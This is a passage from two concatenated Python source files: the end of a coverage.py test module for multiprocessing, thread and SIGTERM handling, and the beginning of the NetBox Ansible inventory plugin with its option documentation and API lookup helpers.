# in the pool don't get any work, and then don't record data.
ret = work(*args)
time.sleep(0.1)
return os.getpid(), ret
if __name__ == "__main__": # pragma: no branch
# This if is on a single line so we can get 100% coverage
# even if we have no arguments.
if len(sys.argv) > 1: multiprocessing.set_start_method(sys.argv[1])
pool = multiprocessing.Pool({NPROCS})
inputs = [(x,) for x in range({UPTO})]
outputs = pool.imap_unordered(process_worker_main, inputs)
pids = set()
total = 0
for pid, sq in outputs:
pids.add(pid)
total += sq
print("%d pids, total = %d" % (len(pids), total))
pool.close()
pool.join()
"""
@pytest.fixture(params=["fork", "spawn"], name="start_method")
def start_method_fixture(request):
"""Parameterized fixture to choose the start_method for multiprocessing."""
start_method = request.param
if start_method not in multiprocessing.get_all_start_methods():
# Windows doesn't support "fork".
pytest.skip(f"start_method={start_method} not supported here")
return start_method
@pytest.mark.skipif(not multiprocessing, reason="No multiprocessing in this Python")
@flaky(max_runs=30) # Sometimes a test fails due to inherent randomness. Try more times.
class MultiprocessingTest(CoverageTest):
"""Test support of the multiprocessing module."""
def try_multiprocessing_code(
self,
code,
expected_out,
the_module,
nprocs,
start_method,
concurrency="multiprocessing",
args="",
):
"""Run code using multiprocessing, it should produce `expected_out`."""
self.make_file("multi.py", code)
self.make_file(".coveragerc", f"""\
[run]
concurrency = {concurrency}
source = .
""")
cmd = "coverage run {args} multi.py {start_method}".format(
args=args, start_method=start_method,
)
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
print(out)
assert out == expected_cant_trace
pytest.skip(f"Can't test: {expected_cant_trace}")
else:
assert out.rstrip() == expected_out
assert len(glob.glob(".coverage.*")) == nprocs + 1
out = self.run_command("coverage combine")
out_lines = out.splitlines()
assert len(out_lines) == nprocs + 1
assert all(
re.fullmatch(r"Combined data file \.coverage\..*\.\d+\.\d+", line)
for line in out_lines
)
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 100%", last_line)
@pytest.mark.skipif(
((3, 11, 0, "alpha", 4, 0) == env.PYVERSION),
#((3, 11, 0, "alpha", 4, 0) == env.PYVERSION) and not env.C_TRACER and env.METACOV,
reason="avoid a 3.11 bug: https://bugs.python.org/issue46389",
)
def test_multiprocessing_simple(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
threading,
nprocs,
start_method=start_method,
)
@pytest.mark.skipif(
((3, 11, 0, "alpha", 4, 0) == env.PYVERSION),
#((3, 11, 0, "alpha", 4, 0) == env.PYVERSION) and not env.C_TRACER and env.METACOV,
reason="avoid a 3.11 bug: https://bugs.python.org/issue46389",
)
def test_multiprocessing_append(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
threading,
nprocs,
args="--append",
start_method=start_method,
)
def test_multiprocessing_and_gevent(self, start_method):
nprocs = 3
upto = 30
code = (
SUM_RANGE_WORK + EVENTLET + SUM_RANGE_Q + MULTI_CODE
).format(NPROCS=nprocs, UPTO=upto)
total = sum(sum(range((x + 1) * 100)) for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
eventlet,
nprocs,
concurrency="multiprocessing,eventlet",
start_method=start_method,
)
def test_multiprocessing_with_branching(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.make_file("multi.py", code)
self.make_file("multi.rc", """\
[run]
concurrency = multiprocessing
branch = True
omit = */site-packages/*
""")
out = self.run_command(f"coverage run --rcfile=multi.rc multi.py {start_method}")
assert out.rstrip() == expected_out
out = self.run_command("coverage combine -q") # sneak in a test of -q
assert out == ""
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 \d+ 0 100%", last_line)
def test_multiprocessing_bootstrap_error_handling(self):
# An exception during bootstrapping will be reported.
self.make_file("multi.py", """\
import multiprocessing
if __name__ == "__main__":
with multiprocessing.Manager():
pass
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
_crash = _bootstrap
""")
out = self.run_command("coverage run multi.py")
assert "Exception during multiprocessing bootstrap init" in out
assert "Exception: Crashing because called by _bootstrap" in out
def test_bug_890(self):
# chdir in multiprocessing shouldn't keep us from finding the
# .coveragerc file.
self.make_file("multi.py", """\
import multiprocessing, os, os.path
if __name__ == "__main__":
if not os.path.exists("./tmp"): os.mkdir("./tmp")
os.chdir("./tmp")
with multiprocessing.Manager():
pass
print("ok")
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
""")
out = self.run_command("coverage run multi.py")
assert out.splitlines()[-1] == "ok"
def test_coverage_stop_in_threads():
has_started_coverage = []
has_stopped_coverage = []
def run_thread(): # pragma: nested
"""Check that coverage is stopping properly in threads."""
deadline = time.time() + 5
ident = threading.current_thread().ident
if sys.gettrace() is not None:
has_started_coverage.append(ident)
while sys.gettrace() is not None:
# Wait for coverage to stop
time.sleep(0.01)
if time.time() > deadline:
return
has_stopped_coverage.append(ident)
cov = coverage.Coverage()
cov.start()
t = threading.Thread(target=run_thread) # pragma: nested
t.start() # pragma: nested
time.sleep(0.1) # pragma: nested
cov.stop() # pragma: nested
t.join()
assert has_started_coverage == [t.ident]
assert has_stopped_coverage == [t.ident]
def test_thread_safe_save_data(tmpdir):
# Non-regression test for: https://github.com/nedbat/coveragepy/issues/581
# Create some Python modules and put them in the path
modules_dir = tmpdir.mkdir('test_modules')
module_names = [f"m{i:03d}" for i in range(1000)]
for module_name in module_names:
modules_dir.join(module_name + ".py").write("def f(): pass\n")
# Shared variables for threads
should_run = [True]
imported = []
old_dir = os.getcwd()
os.chdir(modules_dir.strpath)
try:
# Make sure that all dummy modules can be imported.
for module_name in module_names:
import_local_file(module_name)
def random_load(): # pragma: nested
"""Import modules randomly to stress coverage."""
while should_run[0]:
module_name = random.choice(module_names)
mod = import_local_file(module_name)
mod.f()
imported.append(mod)
# Spawn some threads with coverage enabled and attempt to read the
# results right after stopping coverage collection with the threads
# still running.
duration = 0.01
for _ in range(3):
cov = coverage.Coverage()
cov.start()
threads = [threading.Thread(target=random_load) for _ in range(10)] # pragma: nested
should_run[0] = True # pragma: nested
for t in threads: # pragma: nested
t.start()
time.sleep(duration) # pragma: nested
cov.stop() # pragma: nested
# The following call used to crash with running background threads.
cov.get_data()
# Stop the threads
should_run[0] = False
for t in threads:
t.join()
if (not imported) and duration < 10: # pragma: only failure
duration *= 2
finally:
os.chdir(old_dir)
should_run[0] = False
@pytest.mark.skipif(env.WINDOWS, reason="SIGTERM doesn't work the same on Windows")
@flaky(max_runs=3) # Sometimes a test fails due to inherent randomness. Try more times.
class SigtermTest(CoverageTest):
"""Tests of our handling of SIGTERM."""
def test_sigterm_saves_data(self):
# A terminated process should save its coverage data.
self.make_file("clobbered.py", """\
import multiprocessing
import time
def subproc(x):
if x.value == 3:
print("THREE", flush=True) # line 6, missed
else:
print("NOT THREE", flush=True)
x.value = 0
time.sleep(60)
if __name__ == "__main__":
print("START", flush=True)
x = multiprocessing.Value("L", 1)
proc = multiprocessing.Process(target=subproc, args=(x,))
proc.start()
while x.value != 0:
time.sleep(.05)
proc.terminate()
print("END", flush=True)
""")
self.make_file(".coveragerc", """\
[run]
parallel = True
concurrency = multiprocessing
""")
out = self.run_command("coverage run clobbered.py")
# Under the Python tracer on Linux, we get the "Trace function changed"
# message. Does that matter?
if "Trace function changed" in out:
lines = out.splitlines(True)
assert len(lines) == 5 # "trace function changed" and "self.warn("
out = "".join(lines[:3])
assert out == "START\nNOT THREE\nEND\n"
self.run_command("coverage combine")
out = self.run_command("coverage report -m")
assert self.squeezed_lines(out)[2] == "clobbered.py 17 1 94% 6"
def test_sigterm_still_runs(self):
# A terminated process still runs its own SIGTERM handler.
self.make_file("handler.py", """\
import multiprocessing
import signal
import time
def subproc(x):
print("START", flush=True)
def on_sigterm(signum, frame):
print("SIGTERM", flush=True)
signal.signal(signal.SIGTERM, on_sigterm)
x.value = 0
time.sleep(.1)
print("END", flush=True)
if __name__ == "__main__":
x = multiprocessing.Value("L", 1)
proc = multiprocessing.Process(target=subproc, args=(x,))
proc.start()
while x.value != 0:
time.sleep(.02)
proc.terminate()
""")
self.make_file(".coveragerc", """\
[run]
parallel = True
concurrency = multiprocessing
""")
out = self.run_command("coverage run handler.py")
assert out == "START\nSIGTERM\nEND\n"
|
nb_inventory.py
|
# Copyright (c) 2018 Remy Leone
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
name: nb_inventory
plugin_type: inventory
author:
- Remy Leone (@sieben)
- Anthony Ruhier (@Anthony25)
- Nikhil Singh Baliyan (@nikkytub)
- Sander Steffann (@steffann)
- Douglas Heriot (@DouglasHeriot)
short_description: NetBox inventory source
description:
- Get inventory hosts from NetBox
extends_documentation_fragment:
- constructed
- inventory_cache
options:
plugin:
description: token that ensures this is a source file for the 'netbox' plugin.
required: True
choices: ['netbox.netbox.nb_inventory']
api_endpoint:
description: Endpoint of the NetBox API
required: True
env:
- name: NETBOX_API
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
cert:
description:
- Certificate path
default: False
key:
description:
- Certificate key path
default: False
ca_path:
description:
- CA path
default: False
follow_redirects:
description:
- Determine how redirects are followed.
- By default, I(follow_redirects) is set to uses urllib2 default behavior.
default: urllib2
choices: ['urllib2', 'all', 'yes', 'safe', 'none']
config_context:
description:
- If True, it adds config_context in host vars.
- Config-context enables the association of arbitrary data to devices and virtual machines grouped by
region, site, role, platform, and/or tenant. Please check official netbox docs for more info.
default: False
type: boolean
flatten_config_context:
description:
- If I(config_context) is enabled, by default it's added as a host var named config_context.
- If flatten_config_context is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
flatten_local_context_data:
description:
- If I(local_context_data) is enabled, by default it's added as a host var named local_context_data.
- If flatten_local_context_data is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.3.0"
flatten_custom_fields:
description:
- By default, host custom fields are added as a dictionary host var named custom_fields.
- If flatten_custom_fields is set to True, the fields will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
token:
required: False
description:
- NetBox API token to be able to read against NetBox.
- This may not be required depending on the NetBox setup.
env:
# in order of precedence
- name: NETBOX_TOKEN
- name: NETBOX_API_KEY
plurals:
description:
- If True, all host vars are contained inside single-element arrays for legacy compatibility with old versions of this plugin.
- Group names will be plural (ie. "sites_mysite" instead of "site_mysite")
- The choices of I(group_by) will be changed by this option.
default: True
type: boolean
version_added: "0.2.1"
interfaces:
description:
- If True, it adds the device or virtual machine interface information in host vars.
default: False
type: boolean
version_added: "0.1.7"
site_data:
description:
- If True, sites' full data structures returned from Netbox API are included in host vars.
default: False
type: boolean
prefixes:
description:
- If True, it adds the device or virtual machine prefixes to hostvars nested under "site".
- Must match selection for "site_data", as this changes the structure of "site" in hostvars
default: False
type: boolean
services:
description:
- If True, it adds the device or virtual machine services information in host vars.
default: True
type: boolean
version_added: "0.2.0"
fetch_all:
description:
- By default, fetching interfaces and services will get all of the contents of NetBox regardless of query_filters applied to devices and VMs.
- When set to False, separate requests will be made fetching interfaces, services, and IP addresses for each device_id and virtual_machine_id.
- If you are using the various query_filters options to reduce the number of devices, you may find querying NetBox faster with fetch_all set to False.
- For efficiency, when False, these requests will be batched, for example /api/dcim/interfaces?limit=0&device_id=1&device_id=2&device_id=3
- These GET request URIs can become quite large for a large number of devices. If you run into HTTP 414 errors, you can adjust the max_uri_length option to suit your web server.
default: True
type: boolean
version_added: "0.2.1"
group_by:
description:
- Keys used to create groups. The I(plurals) option controls which of these are valid.
- I(rack_group) is supported on NetBox versions 2.10 or lower only
- I(location) is supported on NetBox versions 2.11 or higher only
type: list
choices:
- sites
- site
- location
- tenants
- tenant
- racks
- rack
- rack_group
- rack_role
- tags
- tag
- device_roles
- role
- device_types
- device_type
- manufacturers
- manufacturer
- platforms
- platform
- region
- cluster
- cluster_type
- cluster_group
- is_virtual
- services
- status
default: []
group_names_raw:
description: Will not add the group_by choice name to the group names
default: False
type: boolean
version_added: "0.2.0"
query_filters:
description: List of parameters passed to the query string for both devices and VMs (Multiple values may be separated by commas)
type: list
default: []
device_query_filters:
description: List of parameters passed to the query string for devices (Multiple values may be separated by commas)
type: list
default: []
vm_query_filters:
description: List of parameters passed to the query string for VMs (Multiple values may be separated by commas)
type: list
default: []
timeout:
description: Timeout for NetBox requests in seconds
type: int
default: 60
max_uri_length:
description:
- When fetch_all is False, GET requests to NetBox may become quite long and return a HTTP 414 (URI Too Long).
- You can adjust this option to be smaller to avoid 414 errors, or larger for a reduced number of requests.
type: int
default: 4000
version_added: "0.2.1"
virtual_chassis_name:
description:
- When a device is part of a virtual chassis, use the virtual chassis name as the Ansible inventory hostname.
- The host var values will be from the virtual chassis master.
type: boolean
default: False
dns_name:
description:
- Force IP Addresses to be fetched so that the dns_name for the primary_ip of each device or VM is set as a host_var.
- Setting interfaces will also fetch IP addresses and the dns_name host_var will be set.
type: boolean
default: False
ansible_host_dns_name:
description:
- If True, sets DNS Name (fetched from primary_ip) to be used in ansible_host variable, instead of IP Address.
type: boolean
default: False
compose:
description: List of custom ansible host vars to create from the device object fetched from NetBox
default: {}
type: dict
"""
EXAMPLES = """
# netbox_inventory.yml file in YAML format
# Example command line: ansible-inventory -v --list -i netbox_inventory.yml
plugin: netbox.netbox.nb_inventory
api_endpoint: http://localhost:8000
validate_certs: True
config_context: False
group_by:
- device_roles
query_filters:
- role: network-edge-router
device_query_filters:
- has_primary_ip: 'true'
# has_primary_ip is a useful way to filter out patch panels and other passive devices
# Query filters are passed directly as an argument to the fetching queries.
# You can repeat tags in the query string.
query_filters:
- role: server
- tag: web
- tag: production
# See the NetBox documentation at https://netbox.readthedocs.io/en/stable/rest-api/overview/
# the query_filters work as a logical **OR**
#
# Prefix any custom fields with cf_ and pass the field value with the regular NetBox query string
query_filters:
- cf_foo: bar
# NetBox inventory plugin also supports Constructable semantics
# You can fill your hosts vars using the compose option:
plugin: netbox.netbox.nb_inventory
compose:
foo: last_updated
bar: display_name
nested_variable: rack.display_name
# You can use keyed_groups to group on properties of devices or VMs.
# NOTE: It's only possible to key off direct items on the device/VM objects.
plugin: netbox.netbox.nb_inventory
keyed_groups:
- prefix: status
key: status.value
# For use in Ansible Tower (AWX), please see this blog from RedHat: https://www.ansible.com/blog/using-an-inventory-plugin-from-a-collection-in-ansible-tower
# The credential for NetBox will need to expose NETBOX_API and NETBOX_TOKEN as environment variables.
# Example Ansible Tower credential Input Configuration:
fields:
- id: NETBOX_API
type: string
label: NetBox Host URL
- id: NETBOX_TOKEN
type: string
label: NetBox API Token
secret: true
required:
- NETBOX_API
- NETBOX_TOKEN
# Example Ansible Tower credential Injector Configuration:
env:
NETBOX_API: '{{ NETBOX_API }}'
NETBOX_TOKEN: '{{ NETBOX_TOKEN }}'
"""
import json
import uuid
import math
import os
from copy import deepcopy
from functools import partial
from sys import version as python_version
from threading import Thread
from typing import Iterable
from itertools import chain
from collections import defaultdict
from ipaddress import ip_interface
from packaging import specifiers, version
from ansible.constants import DEFAULT_LOCAL_TMP
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
from ansible.module_utils.ansible_release import __version__ as ansible_version
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.module_utils.six.moves.urllib.parse import urlencode
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
NAME = "netbox.netbox.nb_inventory"
def _fetch_information(self, url):
results = None
cache_key = self.get_cache_key(url)
# get the user's cache option to see if we should save the cache if it is changing
user_cache_setting = self.get_option("cache")
# read if the user has caching enabled and the cache isn't being refreshed
attempt_to_read_cache = user_cache_setting and self.use_cache
# attempt to read the cache if inventory isn't being refreshed and the user has caching enabled
if attempt_to_read_cache:
try:
results = self._cache[cache_key]
need_to_fetch = False
except KeyError:
# occurs if the cache_key is not in the cache or if the cache_key expired
# we need to fetch the URL now
need_to_fetch = True
else:
# not reading from cache so do fetch
need_to_fetch = True
if need_to_fetch:
self.display.v("Fetching: " + url)
try:
response = open_url(
url,
headers=self.headers,
timeout=self.timeout,
validate_certs=self.validate_certs,
follow_redirects=self.follow_redirects,
client_cert=self.cert,
client_key=self.key,
ca_path=self.ca_path,
)
except urllib_error.HTTPError as e:
"""This will return the response body when we encounter an error.
This is to help determine what might be the issue when encountering an error.
Please check issue #294 for more info.
"""
# Prevent inventory from failing completely if the token does not have the proper permissions for specific URLs
if e.code == 403:
self.display.display(
"Permission denied: {0}. This may impair functionality of the inventory plugin.".format(
url
),
color="red",
)
# Need to return mock response data that is empty to prevent any failures downstream
return {"results": [], "next": None}
raise AnsibleError(to_native(e.fp.read()))
try:
raw_data = to_text(response.read(), errors="surrogate_or_strict")
except UnicodeError:
raise AnsibleError(
"Incorrect encoding of fetched payload from NetBox API."
)
try:
results = json.loads(raw_data)
except ValueError:
raise AnsibleError("Incorrect JSON payload: %s" % raw_data)
# put result in cache if enabled
if user_cache_setting:
self._cache[cache_key] = results
return results
def get_resource_list(self, api_url):
"""Retrieves resource list from netbox API.
Returns:
A list of all resource from netbox API.
"""
if not api_url:
raise AnsibleError("Please check API URL in script configuration file.")
resources = []
# Handle pagination
while api_url:
api_output = self._fetch_information(api_url)
resources.extend(api_output["results"])
api_url = api_output["next"]
return resources
def get_resource_list_chunked(self, api_url, query_key, query_values):
# Make an API call for multiple specific IDs, like /api/ipam/ip-addresses?limit=0&device_id=1&device_id=2&device_id=3
# Drastically cuts down HTTP requests comnpared to 1 request per host, in the case where we don't want to fetch_all
# Make sure query_values is subscriptable
if not isinstance(query_values, list):
query_values = list(query_values)
def query_string(value, separator="&"):
return separator + query_key + "=" + str(value)
# Calculate how many queries we can do per API call to stay within max_url_length
largest_value = str(max(query_values, default=0)) # values are always id ints
length_per_value = len(query_string(largest_value))
chunk_size = math.floor((self.max_uri_length - len(api_url)) / length_per_value)
# Sanity check, for case where max_uri_length < (api_url + length_per_value)
if chunk_size < 1:
chunk_size = 1
if self.api_version in specifiers.SpecifierSet("~=2.6.0"):
# Issue netbox-community/netbox#3507 was fixed in v2.7.5
# If using NetBox v2.7.0-v2.7.4 will have to manually set max_uri_length to 0,
# but it's probably faster to keep fetch_all: True
# (You should really just upgrade your NetBox install)
chunk_size = 1
resources = []
for i in range(0, len(query_values), chunk_size):
chunk = query_values[i : i + chunk_size]
# process chunk of size <= chunk_size
url = api_url
for value in chunk:
url += query_string(value, "&" if "?" in url else "?")
resources.extend(self.get_resource_list(url))
return resources
@property
def group_extractors(self):
# List of group_by options and hostvars to extract
# Some keys are different depending on plurals option
extractors = {
"disk": self.extract_disk,
"memory": self.extract_memory,
"vcpus": self.extract_vcpus,
"status": self.extract_status,
"config_context": self.extract_config_context,
"local_context_data": self.extract_local_context_data,
"custom_fields": self.extract_custom_fields,
"region": self.extract_regions,
"cluster": self.extract_cluster,
"cluster_group": self.extract_cluster_group,
"cluster_type": self.extract_cluster_type,
"is_virtual": self.extract_is_virtual,
self._pluralize_group_by("site"): self.extract_site,
self._pluralize_group_by("tenant"): self.extract_tenant,
self._pluralize_group_by("rack"): self.extract_rack,
"rack_role": self.extract_rack_role,
self._pluralize_group_by("tag"): self.extract_tags,
self._pluralize_group_by("role"): self.extract_device_role,
self._pluralize_group_by("platform"): self.extract_platform,
self._pluralize_group_by("device_type"): self.extract_device_type,
self._pluralize_group_by("manufacturer"): self.extract_manufacturer,
}
# Locations were added in 2.11 replacing rack-groups.
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"location": self.extract_location,
}
)
else:
extractors.update(
{
"rack_group": self.extract_rack_group,
}
)
if self.services:
extractors.update(
{
"services": self.extract_services,
}
)
if self.interfaces:
extractors.update(
{
"interfaces": self.extract_interfaces,
}
)
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
extractors.update(
{
"dns_name": self.extract_dns_name,
}
)
return extractors
def _pluralize_group_by(self, group_by):
mapping = {
"site": "sites",
"tenant": "tenants",
"rack": "racks",
"tag": "tags",
"role": "device_roles",
"platform": "platforms",
"device_type": "device_types",
"manufacturer": "manufacturers",
}
if self.plurals:
mapped = mapping.get(group_by)
return mapped or group_by
else:
return group_by
def _pluralize(self, extracted_value):
# If plurals is enabled, wrap in a single-element list for backwards compatibility
if self.plurals:
return [extracted_value]
else:
return extracted_value
def _objects_array_following_parents(
self, initial_object_id, object_lookup, object_parent_lookup
):
objects = []
object_id = initial_object_id
# Keep looping until the object has no parent
while object_id is not None:
object_slug = object_lookup[object_id]
if object_slug in objects:
# Won't ever happen - defensively guard against infinite loop
break
objects.append(object_slug)
# Get the parent of this object
object_id = object_parent_lookup[object_id]
return objects
def extract_disk(self, host):
return host.get("disk")
def extract_vcpus(self, host):
return host.get("vcpus")
def extract_status(self, host):
return host["status"]
def extract_memory(self, host):
return host.get("memory")
def extract_platform(self, host):
try:
return self._pluralize(self.platforms_lookup[host["platform"]["id"]])
except Exception:
return
def extract_services(self, host):
try:
services_lookup = (
self.vm_services_lookup
if host["is_virtual"]
else self.device_services_lookup
)
return list(services_lookup[host["id"]].values())
except Exception:
return
def extract_device_type(self, host):
try:
return self._pluralize(self.device_types_lookup[host["device_type"]["id"]])
except Exception:
return
def extract_rack(self, host):
try:
return self._pluralize(self.racks_lookup[host["rack"]["id"]])
except Exception:
return
def extract_rack_group(self, host):
# A host may have a rack. A rack may have a rack_group. A rack_group may have a parent rack_group.
# Produce a list of rack_groups:
# - it will be empty if the device has no rack, or the rack has no rack_group
# - it will have 1 element if the rack's group has no parent
# - it will have multiple elements if the rack's group has a parent group
rack = host.get("rack", None)
if not isinstance(rack, dict):
# Device has no rack
return None
rack_id = rack.get("id", None)
if rack_id is None:
# Device has no rack
return None
return self._objects_array_following_parents(
initial_object_id=self.racks_group_lookup[rack_id],
object_lookup=self.rack_groups_lookup,
object_parent_lookup=self.rack_group_parent_lookup,
)
def extract_rack_role(self, host):
try:
return self.racks_role_lookup[host["rack"]["id"]]
except Exception:
return
def extract_site(self, host):
try:
site = self.sites_lookup[host["site"]["id"]]
if (
self.prefixes
): # If prefixes have been pulled, attach prefix to its assigned site
prefix_id = self.prefixes_sites_lookup[site["id"]]
prefix = self.prefixes_lookup[prefix_id]
site["prefix"] = prefix
return self._pluralize(site)
except Exception:
return
def extract_tenant(self, host):
try:
return self._pluralize(self.tenants_lookup[host["tenant"]["id"]])
except Exception:
return
def extract_device_role(self, host):
try:
if "device_role" in host:
return self._pluralize(
self.device_roles_lookup[host["device_role"]["id"]]
)
elif "role" in host:
return self._pluralize(self.device_roles_lookup[host["role"]["id"]])
except Exception:
return
def extract_config_context(self, host):
try:
if self.flatten_config_context:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["config_context"]
else:
return self._pluralize(host["config_context"])
except Exception:
return
def extract_local_context_data(self, host):
try:
if self.flatten_local_context_data:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["local_context_data"]
else:
return self._pluralize(host["local_context_data"])
except Exception:
return
def extract_manufacturer(self, host):
try:
return self._pluralize(
self.manufacturers_lookup[host["device_type"]["manufacturer"]["id"]]
)
except Exception:
return
def extract_primary_ip(self, host):
try:
address = host["primary_ip"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip4(self, host):
try:
address = host["primary_ip4"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip6(self, host):
try:
address = host["primary_ip6"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_tags(self, host):
try:
tag_zero = host["tags"][0]
# Check the type of the first element in the "tags" array.
# If a dictionary (NetBox >= 2.9), return an array of tags' slugs.
if isinstance(tag_zero, dict):
return list(sub["slug"] for sub in host["tags"])
# If a string (NetBox <= 2.8), return the original "tags" array.
elif isinstance(tag_zero, str):
return host["tags"]
# If tag_zero fails definition (no tags), return the empty array.
except Exception:
return host["tags"]
def extract_interfaces(self, host):
try:
interfaces_lookup = (
self.vm_interfaces_lookup
if host["is_virtual"]
else self.device_interfaces_lookup
)
interfaces = deepcopy(list(interfaces_lookup[host["id"]].values()))
before_netbox_v29 = bool(self.ipaddresses_intf_lookup)
# Attach IP Addresses to their interface
for interface in interfaces:
if before_netbox_v29:
interface["ip_addresses"] = list(
self.ipaddresses_intf_lookup[interface["id"]].values()
)
else:
interface["ip_addresses"] = list(
self.vm_ipaddresses_intf_lookup[interface["id"]].values()
if host["is_virtual"]
else self.device_ipaddresses_intf_lookup[
interface["id"]
].values()
)
interface["tags"] = list(sub["slug"] for sub in interface["tags"])
return interfaces
except Exception:
return
def extract_custom_fields(self, host):
try:
return host["custom_fields"]
except Exception:
return
def extract_regions(self, host):
# A host may have a site. A site may have a region. A region may have a parent region.
# Produce a list of regions:
# - it will be empty if the device has no site, or the site has no region set
# - it will have 1 element if the site's region has no parent
# - it will have multiple elements if the site's region has a parent region
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_region_lookup[site_id],
object_lookup=self.regions_lookup,
object_parent_lookup=self.regions_parent_lookup,
)
def extract_location(self, host):
# A host may have a location. A location may have a parent location.
# Produce a list of locations:
# - it will be empty if the device has no location
# - it will have 1 element if the device's location has no parent
# - it will have multiple elements if the location has a parent location
try:
location_id = host["location"]["id"]
except (KeyError, TypeError):
# Device has no location
return []
return self._objects_array_following_parents(
initial_object_id=location_id,
object_lookup=self.locations_lookup,
object_parent_lookup=self.locations_parent_lookup,
)
def extract_cluster(self, host):
try:
# cluster does not have a slug
return host["cluster"]["name"]
except Exception:
return
def extract_cluster_group(self, host):
try:
return self.clusters_group_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_cluster_type(self, host):
try:
return self.clusters_type_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_is_virtual(self, host):
return host.get("is_virtual")
def extract_dns_name(self, host):
# No primary IP assigned
if not host.get("primary_ip"):
return None
before_netbox_v29 = bool(self.ipaddresses_lookup)
if before_netbox_v29:
ip_address = self.ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
if host["is_virtual"]:
ip_address = self.vm_ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
ip_address = self.device_ipaddresses_lookup.get(
host["primary_ip"]["id"]
)
# Don"t assign a host_var for empty dns_name
if ip_address.get("dns_name") == "":
return None
return ip_address.get("dns_name")
def refresh_platforms_lookup(self):
url = self.api_endpoint + "/api/dcim/platforms/?limit=0"
platforms = self.get_resource_list(api_url=url)
self.platforms_lookup = dict(
(platform["id"], platform["slug"]) for platform in platforms
)
def refresh_sites_lookup(self):
# Three dictionaries are created here.
# "sites_lookup_slug" only contains the slug. Used by _add_site_groups() when creating inventory groups
# "sites_lookup" contains the full data structure. Most site lookups use this
# "sites_with_prefixes" keeps track of which sites have prefixes assigned. Passed to get_resource_list_chunked()
url = self.api_endpoint + "/api/dcim/sites/?limit=0"
sites = self.get_resource_list(api_url=url)
# The following dictionary is used for host group creation only,
# as the grouping function expects a string as the value of each key
self.sites_lookup_slug = dict((site["id"], site["slug"]) for site in sites)
if self.site_data or self.prefixes:
# If the "site_data" option is specified, keep the full data structure presented by the API response.
# The "prefixes" option necessitates this structure as well as it requires the site object to be dict().
self.sites_lookup = dict((site["id"], site) for site in sites)
else:
# Otherwise, set equal to the "slug only" dictionary
self.sites_lookup = self.sites_lookup_slug
# The following dictionary tracks which sites have prefixes assigned.
self.sites_with_prefixes = set()
for site in sites:
if site["prefix_count"] > 0:
self.sites_with_prefixes.add(site["slug"])
# Used by refresh_prefixes()
def get_region_for_site(site):
# Will fail if site does not have a region defined in NetBox
try:
return (site["id"], site["region"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to region id
self.sites_region_lookup = dict(map(get_region_for_site, sites))
# Note: depends on the result of refresh_sites_lookup for self.sites_with_prefixes
def refresh_prefixes(self):
# Pull all prefixes defined in NetBox
url = self.api_endpoint + "/api/ipam/prefixes"
if self.fetch_all:
prefixes = self.get_resource_list(url)
else:
prefixes = self.get_resource_list_chunked(
api_url=url,
query_key="site",
query_values=list(self.sites_with_prefixes),
)
self.prefixes_sites_lookup = defaultdict(dict)
self.prefixes_lookup = defaultdict(dict)
# We are only concerned with Prefixes that have actually been assigned to sites
for prefix in prefixes:
if prefix.get("site"):
prefix_id = prefix["id"]
site_id = prefix["site"]["id"]
self.prefixes_lookup[prefix_id] = prefix
self.prefixes_sites_lookup[site_id] = prefix_id
# Remove "site" attribute, as it's redundant when prefixes are assigned to site
del prefix["site"]
def refresh_regions_lookup(self):
url = self.api_endpoint + "/api/dcim/regions/?limit=0"
regions = self.get_resource_list(api_url=url)
self.regions_lookup = dict((region["id"], region["slug"]) for region in regions)
def get_region_parent(region):
# Will fail if region does not have a parent region
try:
return (region["id"], region["parent"]["id"])
except Exception:
return (region["id"], None)
